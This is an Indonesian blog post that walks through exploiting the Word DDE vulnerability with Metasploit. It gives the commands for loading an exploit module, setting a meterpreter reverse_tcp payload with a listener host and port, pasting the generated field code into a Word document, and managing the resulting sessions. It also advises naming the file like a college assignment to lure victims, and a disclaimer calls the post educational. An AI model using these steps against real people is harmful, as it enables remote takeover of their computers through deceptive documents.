Jumat, 08 Desember 2017

Exploit Windows Via DDE Vulnerability

Hallo pemirsa,
selamat malam, salam sejahtera untuk kita semua, wkwkwkwk dah kaya pejabat aja yah.
kali ini gw mau sharing cara exploit windows via dde vuln, ini ilmu lama sih, tapi gak ada kata kadaluarsa dalam mencari ilmu, yg kadaluarsa itu otak loe.

next gak usah bertele-tele...
Pertama siapkan bahan
  • Kali Linux OS
  • Metasploit
  • script dde_vulnerability.rb (plugin)
Next
Kita download dulu plugin metasploitnya, caranya gini nih

  #git clone Link Ini

Link aslinya liat gambar, kalo diatas itu mirror


Kemudian copy file yang tadi di unduh,

  #cp /usr/share/metasploit-framework/modules/exploits/windows/

Kalo udah di copy, buka metasploit

  #msfconsole

Kemudian set seperti ini

  #use exploit/windows/dde_vulnerability

  #set payload windows/meterpreter/reverse_tcp

  #set lhost (ip private loe)

  #set lport (bebas asal kosong)

  #run

Nah, nanti akan nongol kode exploitnya setelah di runing, copy codenya



Setelah itu buka microsoftwordnya versi berapa aja yg jadi? mana gw tau, kalo gw nyoba di versi10, ini gw pake vbox buat buka ms wordnya sekalian buat jadi tergetnya, kalo mau exploit beneran yah kalian set aja dulu seperti ini

Buka ms word kemudian klik Insert > Quick Parts > Field ...



nanti akan muncuk kotak baru, klik oke aja.


Muncul tuliasan !unexpected end of formula, klik kanan pada tulisan itu, kemudian pilih Toggle field coders

Maka muncul kode, ganti kode di dalam kurung kurawal dengan kode yang didapat dri kode running metasploit tadi, pastekan disitu.



Simpan filenya dengan nama bebas. Kalo disini gw kasih nama tugas kuliah, biar memikat korban wkwkwk


Sejauh ini payload sudah disuntik kedalam bug ms word.

Untuk mengexploitasi meterpreternya, tunggu korban membuka file Backdoor kita. Syarat untuk exploitasinya korban harus ngeklik yes 3x ketika muncul notifikasi saat membuka backdoornya dan harus ngetik apa aja di page ms wordnya



Nah suksessdeh exploitnya, kalo dah dapet meterpreternya ya terserah mau di apain wkwkwk


Kalo meterpreter running di background ketik perintah 

  #sessions -l

     #sessions -i 1

Ket. 1 adalah Id meterpreternya




NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
Share this article on :

0 komentar:

Posting Komentar